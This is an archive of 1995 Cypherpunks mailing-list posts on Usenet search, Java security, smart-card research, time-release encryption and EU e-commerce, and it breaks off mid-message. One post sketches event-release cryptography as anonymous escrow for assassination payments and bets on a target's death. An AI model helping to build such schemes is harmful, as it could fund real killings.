From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 11 Nov 1995 08:44:23 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061819.A32268-0100000@tesla.cc.uottawa.ca>




On Mon, 6 Nov 1995, Timothy C. May wrote:

> A good way for newcomers to find out what's been written on some topic that
> interests them, or to see who's writing what. (I checked out the index for:

Lycos includes the entire cpunks archive at hks.net (not just the 
address, the whole damn archive can be keyword searched), also another nice 
method. Did me wonders for a term paper.
Will have to do until keyword searches are added to the archive itself.

(wildcard searches also work at dejanews, which gives me 68 hits for 
tcmay@* , including your sensemedia address. Somehow I don't think any of 
the klaus@* addresses are yours)





From trei at process.com  Fri Nov 10 16:44:38 1995
From: trei at process.com (Peter Trei)
Date: Sat, 11 Nov 1995 08:44:38 +0800
Subject: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <9511062238.AA04563@toad.com>



> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
> http://dejanews.com/
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the latter is
probably a blessing). Specialized news grepping is still useful - see
http://www.iii.net/users/trei/usenet.html for an example.





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei at process.com





From rjc at clark.net  Fri Nov 10 16:44:47 1995
From: rjc at clark.net (Ray Cromwell)
Date: Sat, 11 Nov 1995 08:44:47 +0800
Subject: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <199511062306.SAA13941@clark.net>


> 
> WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> 
> >From the Java Web pages (as combined in Firewalls/BoS):
> 
> > The language's security features (not just applets):

[Long list of bullshit deleted]

 "Dr" Cohen. If you want to criticize Java, why not read the technical
papers rather than spewing questions and assertions based from ignorance.
When you want to criticize a piece of engineering, you don't look
at the feature list or white paper. As is made clear in your post,
you don't know the meanings of phrases used in the Java paper, nor do
you understand how the machinery works. (e.g. byte code verifier)

-Ray









From roy at cybrspc.mn.org  Fri Nov 10 16:44:47 1995
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 11 Nov 1995 08:44:47 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <951106.181650.2r0.rnr.w165w@cybrspc.mn.org>


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, tcmay at got.net writes:

> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/

Just a pointer to the thread in comp.society.privacy re the Dejanews
"Author Profiles".  I expect most any c'punk expects their words to last
forever and eventually get cross-referenced, but some people are getting
really tweaked about seeing all their posting activity correlated.
- -- 
           Roy M. Silvernail     [ ]      roy at cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey at cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6mmBvikii9febJAQFhywP9H5leIfYlmDABeozti6ZAuT+QG/4kR1Aw
6LGEsVtRmyGY6nyXxJ905TRNHk2jegbR2nXEyXEcB+B5cI9Ef1+wqY7JRlWY90gT
KfaDKSTMMX5clXcy0RqGeXJfOJ2QF7vLAwRV87pCH8kVNStfSeMFiSFZSRc75dP2
s6UrpmF0pPw=
=Wyc3
-----END PGP SIGNATURE-----





From sameer at c2.org  Fri Nov 10 16:45:12 1995
From: sameer at c2.org (sameer)
Date: Sat, 11 Nov 1995 08:45:12 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511062347.PAA21652@infinity.c2.org>


> I figured I'd send this to you as a private note, but then I figured 
> this thing really is scary and has a lot to do with anonymity. 
> Watch out folks. Litte Brother is saving everything you've ever said on 
> usenet. Your old posts just won't go away. 

	This is where I step in. ;-)
	DejaNews will soon be putting up a privacy statement where
they refer people to my site if they want privacy. (I haven't cheked,
it may be up there already.)

> 
> (Not that someone who is so open in his views and true name as yourself 
> would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
> yet. It's bad enough they have rec.)
> 
> Ps. I will of course run searches on every other address that the who
> command on majordomo at toad.com supplies me with, so watch what you say 
> ladies, gents and otherwise. ;->
> Get those 'nyms ready.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org
"I don't want to get into the t-shirt business."





From carolann at censored.org  Fri Nov 10 16:46:43 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Sat, 11 Nov 1995 08:46:43 +0800
Subject: Yvette
Message-ID: <199511101724.RAA09597@mailhost1.primenet.com>


Just another Detweiler Tentacle......

Love Always,

Carol Anne Tentaclefinder

>> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
>> is...
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From tcmay at got.net  Fri Nov 10 17:22:37 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 09:22:37 +0800
Subject: coding and nnet's
Message-ID: <acc933c500021004a249@[205.199.118.202]>


At 7:52 PM 11/10/95, Bill Stewart wrote:

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography,
>primarily because of the shape of the solution space.  Neural nets work
>best for
>problems that have a continuity of solutions, some better than others.
>This allows a neural net to learn, proposing better and better solutions as
>it does.
>Breaking an algorithm provides for very little in the way of learning
>opportunities:
>You either recover the key or you don't. (At least this is true if the
>algorithm is
>any good.)  Neural nets work well in structured environments when there is
>something
>to learn, but not in the high-entropy, seemingly random world of cryptography."
>And he doesn't give any references.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
on the usefullness of AI and neural nets for crypto. Sounds almost like
exactly the paragraph I wrote, in fact.

And I recollect that Bruce dropped me a note saying I made the point
succinctly and that he wanted to use what I said in his next edition. (My
recollection at least, but I don't have any easy way anymore of searching
my several hundred megs of accumulated mail, articles, etc.)

I have no problem with Bruce using my points. I hope he didn't use my
_exact_ words, though. But not a cosmic issue.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From rah at shipwright.com  Fri Nov 10 17:47:12 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 11 Nov 1995 09:47:12 +0800
Subject: CFP: CARDIS 1996
Message-ID: <v02120d00acc9aa51a6cc@[199.0.65.105]>


Found this in sci.crypt.research.

Notice the name at the top of the program committee...

Cheers,
Bob Hettinga


___________________________________________



                         First Call For Papers

                              CARDIS 1996

    SECOND SMART CARD RESEARCH AND ADVANCED APPLICATION CONFERENCE

            September 18-20, 1996, Amsterdam, The Netherlands

AIMS AND GOALS

Smart cards or IC cards offer a huge potential for information
processing purposes. The portability and processing power of IC cards
allow for highly secure conditional access and reliable distributed
information systems. IC cards are already available that can perform
highly sophisticated cryptographic computations. The applicability of
IC cards is currently limited mainly by our imagination; the
information processing power that can be gained by using IC cards
remains as yet mostly untapped and is not well understood. Here lies a
vast uncovered research area which we are only beginning to assess, and
which will have great impact on the eventual success of the technology.
The research challenges range from electrical engineering on the
hardware side to tailor-made cryptographic applications on the software
side, and their synergies.

Many currently existing events are mainly devoted to commercial and
application aspects of IC cards. In contrast, the CARDIS conferences
aim to bring together researchers who are active in all aspects of
design of IC cards and related devices and environment, such as to
stimulate synergy between different research communities and to offer a
platform for presenting the latest research advances. CARDIS 1994,
sponsored by the International Federation for Information Processing
(IFIP) and held in November 1994 in Lille, France, has successfully
brought together representatives from leading IC research centers from
all over the world. CARDIS 1996 will be the second occasion for the IC
card community in this permanent activity. CARDIS 1996 will be
organised jointly by the Centre for Mathematics and Computer Science at
Amsterdam (CWI) and the Department of Computer Systems of the
University of Amsterdam (UvA).


SUBMISSIONS

Submissions will be judged on relevance, originality, significance,
correctness, and clarity. Each paper should explain its contribution in
both general and technical terms, identifying what has been
accomplished, saying why it is significant, and comparing it with
previous work. Authors should make every effort to make the technical
content of their papers understandable to a broad audience. Papers
should be written in English.

Authors should submit:

* 16 copies
* of a full paper
* typeset using the Springer LNCS format (see instructions below)
* not exceeding 20 pages in length
* printed double-sided if possible
* addressed to

  Pieter H. Hartel
  Univ. of Amsterdam
  Dept. of Computer Systems
  Kruislaan 403
  1098 SJ Amsterdam
  The Netherlands

In addition, each submission should be accompanied by information
submitted via WWW, (http://www.cwi.nl/~brands/cardis/submit.html) or
submitted via email to cardis at fwi.uva.nl that consists of:

* a single postal address and electronic mail address for
  communication
* complete title, author and affiliation information
* the abstract of the paper
* a small selection of the keywords that appear on this call for
  papers, which best describe the contribution of the paper

Proceedings will be available at the conference. It is intended to
publish the proceedings in the Springer LNCS series. Authors of
accepted papers may be expected to sign a copyright release form.


IMPORTANT DATES

  Submission deadline           March 1, 1996
  Acceptance notification       May 15,  1996
  Camera ready paper due        July 1,  1996
  Conference                    September 18--20 1996

THEMES

    Technology/hardware
 1    IC architecture and techniques
 2    Memories and processor design
 3    Read/Write unit engineering
 4    Specific co-processors for cryptography
 5    Biometry
 6    Communication technologies
 7    Interfaces with the user, the service suppliers
 8    Reliability and fault tolerance
 9    Special devices
10    Standards
    Software
11    The operating system
12    Models of data management
13    Communication protocols
    IC Card design
14    Tools for internal or external software production
15    Validation and verification
16    Methodology for application design
    Electronic payment systems
17    Road pricing
18    Internet payment systems
19    Untraceability
    Algorithms
20    Formal specification and validation
21    Identification
22    Authentication
23    Cryptographic protocols for IC cards
24    Complexity
    Security
25    Models and schemes of security
26    Security interfaces
27    Hardware and software implementation
28    Security of information systems including cards
29    Formal verification of transaction sets
30    Protocol verification
    IC Cards, individuals and the society
31    IC cards and privacy
32    Owner access of data
33    IC cards: political and economical aspects
34    Is the IC card going to change legislation?
35    Patents, copyrights
    Future of ic cards
36    Innovative technologies
37    Moving towards the pocket intelligence
38    Convergence with portable PCs, lap tops etc ...
39    PCMCIA
    Innovative applications
40    Design methodology of applications
41    IC cards and the information system
42    Examples of new applications
43    Requirements for innovative cards
    Standards
44    Emerging standards
45    Compliance and approval


ORGANISATION

Steering committee chairman:

  Vincent Cordonnier (Rd2p, Lille)

Local organisation:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Stefan Brands (CWI, The Netherlands)
  Eduard de Jong (QC consultancy, The Netherlands)

General Chairman:

  Pieter Hartel (Southampton, UK and UvA, The Netherlands)

Program Chairmen:

  Pierre Paradinas (Rd2p, Lille)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)

Program committee

  Stefan Brands (CWI, Amsterdam)
  Andr\'e Gamache (Qu\'ebec, Canada)
  Louis Guillou (CCETT, France)
  Josep Domingo Ferrer (Tarragon, Spain)
  Pieter Hartel (Southampton, UK and UvA, The Netherlands)
  Hans-Joachim Knobloch (Karlsruhe, Germany)
  Pierre Paradinas (Rd2p, France)
  Reinhard Posch (Graz, Austria)
  Jean-Jacques Quisquater  (Louvain-la-Neuve, Belgium)
  Matt Robshaw (RSA, inc, USA)
  Bruno Struif (GMD, Germany)
  Doug Tygar (Carnegie-Mellon, USA)


LECTURE NOTES IN COMPUTER SCIENCE

Advice to Authors for the Preparation of Camera-Ready Contributions to
LNCS/LNAI Proceedings

The preparation of manuscripts which are to be reproduced by
photo-offset requires special care. Manuscripts which are submitted in
technically unsuitable form will be returned for retyping or cancelled
if the volume otherwise cannot be finished on time. In order to make
the volume look as uniform as possible the following instructions
should be followed closely.

************

* PRINTING AREA:
Using 10-point font size for the main text the printing area should be
12.2 x 19.3 cm. Manuscripts prepared in this preferred format are
reproduced in the same size in the book. With these settings, the
interline distance should be arranged in such a way that some 42 to 45
lines occur on a full-text page.

* TYPEFACE and SIZE:
We recommend the use of Times or one of the similar typefaces widely
used in phototypesetting. (In Times and similar typefaces the letters
have serifs, i.e., short endstrokes at the head and the foot of
letters.) Please do not use a sans-serif typeface for running text,
except for computer programs.

The text should always be justified to occupy the full line width, so
that the right margin is not ragged. For normal text please use
10-point type size and one-line spacing. Small print (abstract and
affiliation) should be set in 9-point type size. Please use italic
print to emphasize words in running text; bold type in running text
and underlining should be avoided.

Headings should be capitalized (i.e., nouns, verbs and all other words
with at least five letters should have a capital initial) and should,
with the exception of the title, be aligned to the left. The font
sizes are as follows:

************

Heading level      Example Font          size and style

Title (centered)     Type Theory           14 point, bold
1st-level heading    1 Introduction        12 point, bold
2nd-level heading  2.1 Simple Connections  10 point, bold
3rd-level heading    Typing Rules.         10 point, bold
4th-level heading  Remarks: (text follows) 10 point,italic

************

* FIGURES:
If possible, originals should be pasted into the manuscript and
centered between the margins; if no originals of the required size are
available, figures may be reduced in scale and pasted into the text.
For halftone figures (photos), please forward high-contrast glossy
prints and mark the space in the text as well as the back of the
photographs clearly, so that there can be no doubt about where or
which way up they should be placed. The lettering of figures should be
in 10-point font size. Figures should be numbered. The legends also
should be centered between the margins and be written in 9-point font
size as follows:

(bold) Fig. 3. (text follows)

* PAGE NUMBERING:
Your paper should show no printed page numbers; they are decided by
the volume editor and finally inserted by the printer. Please indicate
the ordering of your pages by numbering the sheets (using a light
blue/green pencil) at the bottom of the reverse side. There also
should be no running heads.

* PRINTING QUALITY:
For reproduction we need sheets which are printed on one side only.
Please use a high-resolution printer, preferably a laser printer with
at least 300 dpi or higher resolution if possible. It is desirable
that on all pages the text appears in the middle of the sheets.

* REMARK 1:
If your typesetting system does not offer the variety of font sizes
needed for the preparation of your manuscript according to these
instructions, you may choose a different (larger) font size and a
correspondingly scaled printing area (12-point font size for the
running text, for example, corresponds to a printing area of 15.3 x
24.2 cm and to a final reduction rate of 80%).

* REMARK 2:
You are encouraged to use LaTeX or TeX for the preparation of you
camera-ready manuscript together with the corresponding Springer style
files "llncs" (for LaTeX) or "plncs" (for TeX) to be obtained by
e-mail or by ftp/gopher as follows:

Mailserver: Send an e-mail message to
   svserv at vax.ntp.springer.de  containing the line
   get /tex/latex/llncs.zip  for the LaTeX syle files or
   get /tex/plain/plncs.zip  for the TeX style files.
Sending "help" to the server prompts advice on how to interact with
the mail server. The style files have to be unzipped and uu-decoded
for use. In case of problems in getting or uu-decoding the style files
please contact "springer vax.ntp.springer.de".

Ftp: The internet address is "trick.ntp.springer.de", the user id
"ftp" or "anonymous". Please enter your e-mail address as password.
The (above mentioned) files reside in "/pub/tex/latex/llncs".

Gopher: Point your client to "trick.ntp.springer.de".


-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From tcmay at got.net  Fri Nov 10 19:52:46 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 11 Nov 1995 11:52:46 +0800
Subject: New World Encryption
Message-ID: <acc9550f0102100474a5@[205.199.118.202]>


At 2:49 AM 11/11/95, James M. Cobb wrote:
>
>
>Friend,
>
>
>An item in 11 09 95 Edupage summarizes a NY Times new-
>sstory revealing Clinton's wish to spy on the world:
>
>OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND


"Friend,"

I'm sure your intentions are good in forwarding this and other similar
items to the Cypherpunks mailing list, but if you are reading the list, you
should surely know that this item--including both summaries and the
complete article--have already been posted to the Cypherpunks list. Two
days ago, in fact.

If for some reason you are _not_ reading the CP list, or not paying
attention, then you really should not be forwarding stuff to it.

I'm copying the CP list on this to remind folks to "stay on the page" as to
what's already been posted. We are already becoming a kind of "automatic
cc:" for a variety of announcements, spams, and other earthshattering
items.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From jgrubs at left.webcasters.com  Fri Nov 10 19:58:25 1995
From: jgrubs at left.webcasters.com (jgrubs at left.webcasters.com)
Date: Sat, 11 Nov 1995 11:58:25 +0800
Subject: POTP Security
Message-ID: <gate.RXLDeD1w165w@left.webcasters.com>


>POTP(tm) Secure FTP version 1.5 for MS Windows
>===============================================
>
>The first commercially available implementation of our 
>POTP (Power One Time Pad) encryption algorithm. The package includes 
>a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
>a stand alone file encryption program.
>
>Both our client and server support standard ftp, in addition to 
>absolutely user-transparent encryption on-the-fly of all data 
>sent/received when connected to a POTP Secure FTP Server/Client.

What level of security does this cute, little puppy provide???







From droelke at spirit.aud.alcatel.com  Sat Nov 11 14:02:28 1995
From: droelke at spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 11 Nov 95 14:02:28 PST
Subject: Who needs time vaults anyway?
Message-ID: <9511112202.AA06738@spirit.aud.alcatel.com>


> 
> As for real time-release - how about just using conventional encryption, 
> and require it to be brute-forced?
> 
> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 

The problem here is that it is probablistic when they are 
going to be able to unlock it.  If the search space will take a
total of 10 years to exhaustively search, there is a 50% chance
that they will find the key within 5 years, 10% chance that it
will be found in 1 year, etc.  So, if you are lucky, it will
be found in about the time you want it to be.  If you aren't it
will be found in a few milli-seconds.

There is also the problem that your intended recipeient will
need to expend just as much work as your advesary to decrypt
the message.  This might not be a disadvantage in the case of 
a "broadcast" message, but otherwise it might be.

Good idea - but I would say not pratical....
Now, if we just had an objects between 1 and 10 light years away 
that you could bounce lasers off of...... ;-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke at aud.alcatel.com                             Richardson, TX






From shields at tembel.org  Sat Nov 11 18:15:21 1995
From: shields at tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:15:21 PST
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <483l88$1f0@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111953.MAA26503 at nagina.cs.colorado.edu>,
Bryce <wilcoxb at nagina.cs.colorado.edu> wrote:
> A single station could serve up multiple pieces.  It would only
> reveal the k piece if the querying agent can prove that he has the 
> k-1 piece.  Of course if the total number of stations is small then 
> the "physically move the pieces" trick might work.

But you're back to trusting an agent or device not to reveal a secret.
What have you gained?

The point about moving the elements of the message physically apart has
merit, though.  So the one-time pad of timerel, the ideally secure but
unworkable model, is to encrypt your message with an OTP, then securely
transport the pad and location to points that are $ct$ metres apart,
where $t$ is the length of time you want to keep your message secret.
You could do this with a reflector $ct/2$ metres away, assuming your
opponent and you are in the same location.

I suppose this could be useful for very short-term applications (for
reference, the diameter of the solar system is about 5.4 light-hours),
but like the OTP, its application is limited.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVYPeyjYMb1RsVfAQFvnAP9H7KfW6pDxvHJF2lIucJyuHX8W2Adrxbd
X5rawyQctlAWwRcef6JIPxHcUuL6uznW7bMXrDQMIzDjQMQ/Rb9SdxKdncU0sNQ3
kEuoCKI0r7FJtRS5fSByB6TyQ9dCJJGVRed7P9KVzjP6bCk7Ri889SfNLBd583Kp
INOMxDJ0sDY=
=LtqD
-----END PGP SIGNATURE-----
-- 
Shields.





From shields at tembel.org  Sat Nov 11 18:25:29 1995
From: shields at tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:25:29 PST
Subject: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <483lqg$1kt@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02120d05accab753260f@[199.0.65.105]>,
Robert Hettinga <rah at shipwright.com> wrote:
> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Note that with event-release crypto, the houses could make a public key
available, with the secret key to be held until the death of Tom Target.
That key pair could be used by any of its anonymous buyers while the
crypto house remained ignorant not only of the content and authorship
of the messages, but even of the messages' existance -- nothing at all
to subpoena.  The same key could be used by Tom to encrypt his will, by
the assassin's employer to encrypt the payment, and by anyone to place
a bet on whether Tom will die within a certain period of time (by using
ecash that expires, like Digicash).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVaheyjYMb1RsVfAQEf7wP+OBRVv0UaoO6TLOcCHkwnMF8fMBFc2X3P
8fNV+ICtgWZwp+Bso58h3ocbyx9ilNOhI5l67JG4Oio+84gAnGpWS392KuXu84un
ROpO5ityE0Vhb//ToreVdQVCMvvSsO9cNOQCtFN4v9z/H+YD9YlE0yjp9fTsa32M
th9WA86OmbM=
=V97C
-----END PGP SIGNATURE-----
-- 
Shields.





From Anonymous.ReMailer at f21.n216.z1.fidonet.org  Sat Nov 11 19:32:32 1995
From: Anonymous.ReMailer at f21.n216.z1.fidonet.org (Anonymous ReMailer)
Date: Sat, 11 Nov 95 19:32:32 PST
Subject: [NOISE] The State will wither away?
Message-ID: <c8c_9511112201@nisc.fidonet.org>



Dale Worley (worley at world.std.com):
>It has become fashionable these days to say "The government can't suppress
><whatever>", usually with the smug implication that the speaker is getting
>away with <whatever>, and thus is more studly than the government.  However,
>these people are almost always wrong.  The correct statement is "The
>government isn't willing to expend the effort to suppress <whatever>."
>Anyone who wishes to disprove this is invited to sell heroin in Singapore.
Hey Duncan Frisell! Any kind words for this guy AFA risk assessment?

=================================================
This message has been forwarded by an anonymous remailer.  It is not from
where it appears.  For more information, send a message to HELP at 1:216/21.

--- ReMail RML00.03





From joelm at eskimo.com  Sun Nov 12 07:59:14 1995
From: joelm at eskimo.com (Joel McNamara)
Date: Sun, 12 Nov 95 07:59:14 PST
Subject: SEMPER
Message-ID: <199511121558.HAA27914@mail.eskimo.com>


And now for something completely different, a Euro-centric plan for Net
digital commerce.

Haven't had a chance to look at the URL yet, but obviously crypto-relevant...

Joel
----------
Development of Electronic Marketplace:
				   
				   
		      EUROPEAN COMMISSION FUNDS
		       FIRST OPEN SOLUTION FOR
		  SECURE COMMERCE OVER THE INTERNET
				   
			    PRESS RELEASE
                              

Z�rich, November 2nd, 1995:

     Backed by the European Commission, a consortium of 20 partners
from European industry and academia has embarked on a research project
to develop the fundamentals for secure electronic commerce.
     The goal of the 9-million ECU (approx. 14 million CHF) project,
SEMPER (Secure Electronic Marketplace for Europe), is to provide the
first open and comprehensive solutions for secure commerce over the
Internet and other public information networks.


A wide range of businesses are rapidly moving to explore the huge
potential of networked information systems, especially with the
Internet-based WWW (World-wide Web). The Internet, which already
connects more than 3 million computers and a substantially larger
number of users, is growing at a breathtaking pace with thousands of
newcomers every day.

Although the Internet has its roots in academia and is still dominated
by free-of-charge information, dramatic changes are expected in the
near future. For instance, the WWW will be used for a wide variety of
electronic commerce such as on- line trade or delivery of advanced
multimedia information services. The evolution of broadband networks
and "information highways" will intensify this trend.

The need for secure transactions in this new business environment,
which involves networks available to the general public, has triggered
a number of related efforts.  These initial developments are based
almost exclusively in the US and most of them are limited to
proprietary, or otherwise closed solutions, involving only electronic
payment issues. In contrast, SEMPER is directed towards a
comprehensive solution for secure electronic commerce, considering
legal, commercial, social, and technical requirements as well as
different options for an electronic marketplace.

Consistent with its broader goals, the SEMPER project will be managed
by an interdisciplinary team of experts from the academic, industrial
and general business environment in Europe. The team includes
representatives of the social sciences, finance, retail, publishing,
as well as in information and telecommunication technology.

The first of the three one-year phases will address a coherent
security model and a generic, open security architecture for the
electronic marketplace. This architecture will be independent of
specific hardware, software, or network architectures. The most
fundamental electronic commerce services, such as secure offering,
order, payment and information delivery, will also be integrated in
the first phase.

Subsequent phases will concentrate on more advanced services. These
will include fair exchange of documents, credentials, advanced
document processing, notary services and multimedia-specific security
services, such as protection of intellectual property
rights. Multi-party security and protection of user's privacy will
receive prime attention. SEMPER will use and integrate existing
architectures, tools, and services where appropriate.

Early trials will be provided for WWW, and subsequent tests performed
on ATM-based broadband networks to demonstrate the broad applicability
of SEMPER's architecture and services.

The SEMPER project is part of the Advanced Communication Technologies
and Services (ACTS) research program established by the European
Commission Directorate General XIII for 1994-1998. ACTS is the
follow-on program for Research on Advanced Communications in Europe
(RACE) 1987- 1994. The project will establish a Special Interest Group
for Secure Electronic Commerce (SIGSEC) which will make results
available to all interested parties, including standardisation bodies,
and will co-ordinate related projects, in particular those funded by
the European Commission.

IBM's Zurich Research Laboratory will provide the technical leadership
for the SEMPER project, and IBM France will act as co-ordinator. The
other members of the consortium are Cryptomathic (DK), DigiCash (NL),
EUROCOM EXPERTISE (GR), Europay International (B), FOGRA
Forschungsgesellschaft Druck (D), GMD - German National Research
Center for Information Technology (D), IBM European Networking Center
(D), INTRACOM (GR), KPN Research (NL), Otto-Versand (D), r3 security
engineering (CH), SEPT (F), Stichting Mathematisch Centrum / CWI (NL),
University of Freiburg (D), University of Hildesheim (D). Banksys (B),
Banque Generale du Luxembourg (L) and Telekurs (CH) are associated
with SEMPER.

For more information please contact

     Matthias Schunter                    Philippe Delaoutre
     Universitaet Hildesheim              IBM France
     Mail: schunter at rz.uni-hildesheim.de  Mail: FRIBMSPK at IBM.COM
     Tel. + 49 5121 883 788               Tel. + 33 1 49 05 61 12
     Fax  + 49 5121 883 732               Fax  + 33 1 47 68 40 33

or see

     <http://semper.darmstadt.gmd.de/~semper>
or   <http://www.zurich.ibm.com/Technology/Security/extern/semper/>.






From jgrubs at left.webcasters.com  Sun Nov 12 08:02:33 1995
From: jgrubs at left.webcasters.com (Jim Grubs W8GRT)
Date: Sun, 12 Nov 95 08:02:33 PST
Subject: POTP Security
In-Reply-To: <4uigeD3w165w@left.webcasters.com>
Message-ID: <B3igeD4w165w@left.webcasters.com>


Path: left!jgrubs
From: jgrubs at left.webcasters.com (Jim Grubs (W8GRT))
Newsgroups: alt.security.pgp
Subject: Re: POTP Security
Message-ID: <4uigeD3w165w at left.webcasters.com>
Date: Sun, 12 Nov 95 09:17:02 EST
References: <70LDeD1w165w at left.webcasters.com>
Reply-To: jgrubs at left.webcasters.com (Jim Grubs (W8GRT))
Organization: WebCasters(tm)

jgrubs at left.webcasters.com (Jim Grubs (W8GRT)) writes:

> 
> What level of security does this cute, little puppy provide???
> 

Summary of e-mail responses >--> POOR TO NONE.

Thanks, everyone.



--
                               WebCasters(tm)
      James C. Grubs                             jgrubs at webcasters.com
      6817 Maplewood Avenue                         Tel.: 419-882-2697
      Sylvania, OH 43560                             Fax: 419-885-2814
        Internet consulting, HTML programming, Information brokering
                   http:://www.webcasters.com/webcasters/
 





From spjapo at uta.fi  Sun Nov 12 09:47:46 1995
From: spjapo at uta.fi (Jaana Segerberg)
Date: Sun, 12 Nov 95 09:47:46 PST
Subject: (no subject)
Message-ID: <199511121747.TAA16827@uta.fi>



[Prev][Next][Index]

Pornography Server

----------------------------------------------------------------------------

   *  To: Cypherpunks Mailing List <cypherpunks at toad.com>
   *  Subject: Pornography Server
   *  From: "Robert A. Hayden" <hayden at krypton.mankato.msus.edu>
   *  Date: Sun, 13 Feb 1994 12:23:28 -0600 (CST)

----------------------------------------------------------------------------

In response to the posting about setting up a pornography server (Sorry,
I'm afraid I deleted the specific message so I cannot remember who you
was :-).

That is certainly a way for people to get and use PGP and to get used the
remailers.  It would get a lot of heavy use as well.  Now, if there was a
way to batch mailings (so that if, say, six people ordered one item, it
would be sent as one letter to all six instead of six different letters,
with precedence set to bulk), that would help even more.

Now, there are also some practical considerations as well.  What
materials do you archive?  If you put up pictures (gif or jpeg), you will
be talking about tremendous amounts of traffic.  Once they are uuencoded,
even with compression, they can be huge.  If you limit yourself to things
such as stories and the like, you will have less traffic, but also less
use.

There is also the legal side of distributing pornography.   Interstate
transfer is naughty and with Al Gore's Information-Superhighway Patrol,
it will raise some very political issues (but, by using a decent blind
system, for all the patrol knows, the distributor might be in the
recipient's state).

Also, and this is really just an interface issue, scripts should be
developed that will automate the retrieval process (ie, build and submit
the mail message).  These would be similiar to the hop.mail or anon.mail
scripts, but would be custom to the pornography server.

For example:
